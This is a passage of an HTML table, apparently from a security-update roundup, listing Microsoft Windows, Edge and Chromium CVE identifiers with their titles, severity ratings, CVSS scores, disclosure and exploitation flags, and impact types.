  <td>Windows Recovery Environment Security Feature Bypass Vulnerability</td>
  <td>Important</td>
  <td>4.6</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32216">CVE-2026-32216</a></td>
  <td>Windows Redirected Drive Buffering System Denial of Service Vulnerability</td>
  <td>Important</td>
  <td>5.5</td>
  <td>No</td>
  <td>No</td>
  <td>DoS</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27909">CVE-2026-27909</a></td>
  <td>Windows Search Service Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26161">CVE-2026-26161</a></td>
  <td>Windows Sensor Data Service Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26174">CVE-2026-26174</a></td>
  <td>Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32224">CVE-2026-32224</a></td>
  <td>Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26154">CVE-2026-26154</a></td>
  <td>Windows Server Update Service (WSUS) Tampering Vulnerability</td>
  <td>Important</td>
  <td>7.5</td>
  <td>No</td>
  <td>No</td>
  <td>Tampering</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26165">CVE-2026-26165</a></td>
  <td>Windows Shell Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26166">CVE-2026-26166</a></td>
  <td>Windows Shell Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27918">CVE-2026-27918</a></td>
  <td>Windows Shell Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32151">CVE-2026-32151</a></td>
  <td>Windows Shell Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>6.5</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32225">CVE-2026-32225</a></td>
  <td>Windows Shell Security Feature Bypass Vulnerability</td>
  <td>Important</td>
  <td>8.8</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32202">CVE-2026-32202</a></td>
  <td>Windows Shell Spoofing Vulnerability</td>
  <td>Important</td>
  <td>4.3</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32082">CVE-2026-32082</a></td>
  <td>Windows Simple Search and Discovery Protocol (SSDP) Service Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32083">CVE-2026-32083</a></td>
  <td>Windows Simple Search and Discovery Protocol (SSDP) Service Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32068">CVE-2026-32068</a></td>
  <td>Windows Simple Search and Discovery Protocol (SSDP) Service Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32183">CVE-2026-32183</a></td>
  <td>Windows Snipping Tool Remote Code Execution Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32089">CVE-2026-32089</a></td>
  <td>Windows Speech Brokered Api Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32090">CVE-2026-32090</a></td>
  <td>Windows Speech Brokered Api Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32153">CVE-2026-32153</a></td>
  <td>Windows Speech Runtime Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27907">CVE-2026-27907</a></td>
  <td>Windows Storage Spaces Controller Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32076">CVE-2026-32076</a></td>
  <td>Windows Storage Spaces Controller Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27908">CVE-2026-27908</a></td>
  <td>Windows TDI Translation Driver (tdx.sys) Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27921">CVE-2026-27921</a></td>
  <td>Windows TDI Translation Driver (tdx.sys) Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27915">CVE-2026-27915</a></td>
  <td>Windows UPnP Device Host Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27919">CVE-2026-27919</a></td>
  <td>Windows UPnP Device Host Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32075">CVE-2026-32075</a></td>
  <td>Windows UPnP Device Host Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27916">CVE-2026-27916</a></td>
  <td>Windows UPnP Device Host Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27920">CVE-2026-27920</a></td>
  <td>Windows UPnP Device Host Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32077">CVE-2026-32077</a></td>
  <td>Windows UPnP Device Host Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27925">CVE-2026-27925</a></td>
  <td>Windows UPnP Device Host Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>6.5</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32156">CVE-2026-32156</a></td>
  <td>Windows UPnP Device Host Remote Code Execution Vulnerability</td>
  <td>Important</td>
  <td>7.4</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32223">CVE-2026-32223</a></td>
  <td>Windows USB Printing Stack (usbprint.sys) Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>6.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32165">CVE-2026-32165</a></td>
  <td>Windows User Interface Core Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27911">CVE-2026-27911</a></td>
  <td>Windows User Interface Core Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32163">CVE-2026-32163</a></td>
  <td>Windows User Interface Core Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32164">CVE-2026-32164</a></td>
  <td>Windows User Interface Core Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23670">CVE-2026-23670</a></td>
  <td>Windows Virtualization-Based Security (VBS) Security Feature Bypass Vulnerability</td>
  <td>Important</td>
  <td>5.7</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27917">CVE-2026-27917</a></td>
  <td>Windows WFP NDIS Lightweight Filter Driver (wfplwfs.sys) Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32080">CVE-2026-32080</a></td>
  <td>Windows WalletService Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32222">CVE-2026-32222</a></td>
  <td>Windows Win32k Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21637">CVE-2026-21637 *</a></td>
  <td> HackerOne: CVE-2026-21637 TLS PSK/ALPN Callback Exceptions Bypass Error Handlers</td>
  <td> Moderate</td>
  <td>7.5</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33119">CVE-2026-33119</a></td>
  <td>Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability</td>
  <td>Moderate</td>
  <td>5.4</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33829">CVE-2026-33829</a></td>
  <td>Windows Snipping Tool Spoofing Vulnerability</td>
  <td>Moderate</td>
  <td>4.3</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5858">CVE-2026-5858 *</a></td>
  <td>Chromium: CVE-2026-5858 Heap buffer overflow in WebML</td>
  <td>Critical</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5859">CVE-2026-5859 *</a></td>
  <td>Chromium: CVE-2026-5859 Integer overflow in WebML</td>
  <td>Critical</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5272">CVE-2026-5272 *</a></td>
  <td>Chromium: CVE-2026-5272 Heap buffer overflow in GPU</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5273">CVE-2026-5273 *</a></td>
  <td>Chromium: CVE-2026-5273 Use after free in CSS</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5274">CVE-2026-5274 *</a></td>
  <td>Chromium: CVE-2026-5274 Integer overflow in Codecs</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5275">CVE-2026-5275 *</a></td>
  <td>Chromium: CVE-2026-5275 Heap buffer overflow in ANGLE</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5276">CVE-2026-5276 *</a></td>
  <td>Chromium: CVE-2026-5276 Insufficient policy enforcement in WebUSB</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5277">CVE-2026-5277 *</a></td>
  <td>Chromium: CVE-2026-5277 Integer overflow in ANGLE</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5279">CVE-2026-5279 *</a></td>
  <td>Chromium: CVE-2026-5279 Object corruption in V8</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5280">CVE-2026-5280 *</a></td>
  <td>Chromium: CVE-2026-5280 Use after free in WebCodecs</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5283">CVE-2026-5283 *</a></td>
  <td>Chromium: CVE-2026-5283 Inappropriate implementation in ANGLE</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5284">CVE-2026-5284 *</a></td>
  <td>Chromium: CVE-2026-5284 Use after free in Dawn</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5285">CVE-2026-5285 *</a></td>
  <td>Chromium: CVE-2026-5285 Use after free in WebGL</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5286">CVE-2026-5286 *</a></td>
  <td>Chromium: CVE-2026-5286 Use after free in Dawn</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5287">CVE-2026-5287 *</a></td>
  <td>Chromium: CVE-2026-5287 Use after free in PDF</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5289">CVE-2026-5289 *</a></td>
  <td>Chromium: CVE-2026-5289 Use after free in Navigation</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5290">CVE-2026-5290 *</a></td>
  <td>Chromium: CVE-2026-5290 Use after free in Compositing</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5860">CVE-2026-5860 *</a></td>
  <td>Chromium: CVE-2026-5860 Use after free in WebRTC</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5861">CVE-2026-5861 *</a></td>
  <td>Chromium: CVE-2026-5861 Use after free in V8</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5862">CVE-2026-5862 *</a></td>
  <td>Chromium: CVE-2026-5862 Inappropriate implementation in V8</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5863">CVE-2026-5863 *</a></td>
  <td>Chromium: CVE-2026-5863 Inappropriate implementation in V8</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5864">CVE-2026-5864 *</a></td>
  <td>Chromium: CVE-2026-5864 Heap buffer overflow in WebAudio</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5865">CVE-2026-5865 *</a></td>
  <td>Chromium: CVE-2026-5865 Type Confusion in V8</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5866">CVE-2026-5866 *</a></td>
  <td>Chromium: CVE-2026-5866 Use after free in Media</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5867">CVE-2026-5867 *</a></td>
  <td>Chromium: CVE-2026-5867 Heap buffer overflow in WebML</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5868">CVE-2026-5868 *</a></td>
  <td>Chromium: CVE-2026-5868 Heap buffer overflow in ANGLE</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5869">CVE-2026-5869 *</a></td>
  <td>Chromium: CVE-2026-5869 Heap buffer overflow in WebML</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5870">CVE-2026-5870 *</a></td>
  <td>Chromium: CVE-2026-5870 Integer overflow in Skia</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5871">CVE-2026-5871 *</a></td>
  <td>Chromium: CVE-2026-5871 Type Confusion in V8</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5872">CVE-2026-5872 *</a></td>
  <td>Chromium: CVE-2026-5872 Use after free in Blink</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5873">CVE-2026-5873 *</a></td>
  <td>Chromium: CVE-2026-5873 Out of bounds read and write in V8</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5291">CVE-2026-5291 *</a></td>
  <td>Chromium: CVE-2026-5291 Inappropriate implementation in WebGL</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5292">CVE-2026-5292 *</a></td>
  <td>Chromium: CVE-2026-5292 Out of bounds read in WebCodecs</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5874">CVE-2026-5874 *</a></td>
  <td>Chromium: CVE-2026-5874 Use after free in PrivateAI</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5875">CVE-2026-5875 *</a></td>
  <td>Chromium: CVE-2026-5875 Policy bypass in Blink</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5876">CVE-2026-5876 *</a></td>
  <td>Chromium: CVE-2026-5876 Side-channel information leakage in Navigation</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5877">CVE-2026-5877 *</a></td>
  <td>Chromium: CVE-2026-5877 Use after free in Navigation</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5878">CVE-2026-5878 *</a></td>
  <td>Chromium: CVE-2026-5878 Incorrect security UI in Blink</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5879">CVE-2026-5879 *</a></td>
  <td>Chromium: CVE-2026-5879 Insufficient validation of untrusted input in ANGLE</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5880">CVE-2026-5880 *</a></td>
  <td>Chromium: CVE-2026-5880 Incorrect security UI in browser UI</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5881">CVE-2026-5881 *</a></td>
  <td>Chromium: CVE-2026-5881 Policy bypass in LocalNetworkAccess</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5882">CVE-2026-5882 *</a></td>
  <td>Chromium: CVE-2026-5882 Incorrect security UI in Fullscreen</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5883">CVE-2026-5883 *</a></td>
  <td>Chromium: CVE-2026-5883 Use after free in Media</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5884">CVE-2026-5884 *</a></td>
  <td>Chromium: CVE-2026-5884 Insufficient validation of untrusted input in Media</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5885">CVE-2026-5885 *</a></td>
  <td>Chromium: CVE-2026-5885 Insufficient validation of untrusted input in WebML</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5886">CVE-2026-5886 *</a></td>
  <td>Chromium: CVE-2026-5886 Out of bounds read in WebAudio</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5887">CVE-2026-5887 *</a></td>
  <td>Chromium: CVE-2026-5887 Insufficient validation of untrusted input in Downloads</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5888">CVE-2026-5888 *</a></td>
  <td>Chromium: CVE-2026-5888 Uninitialized Use in WebCodecs</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5889">CVE-2026-5889 *</a></td>
  <td>Chromium: CVE-2026-5889 Cryptographic Flaw in PDFium</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5890">CVE-2026-5890 *</a></td>
  <td>Chromium: CVE-2026-5890 Race in WebCodecs</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5891">CVE-2026-5891 *</a></td>
  <td>Chromium: CVE-2026-5891 Insufficient policy enforcement in browser UI</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
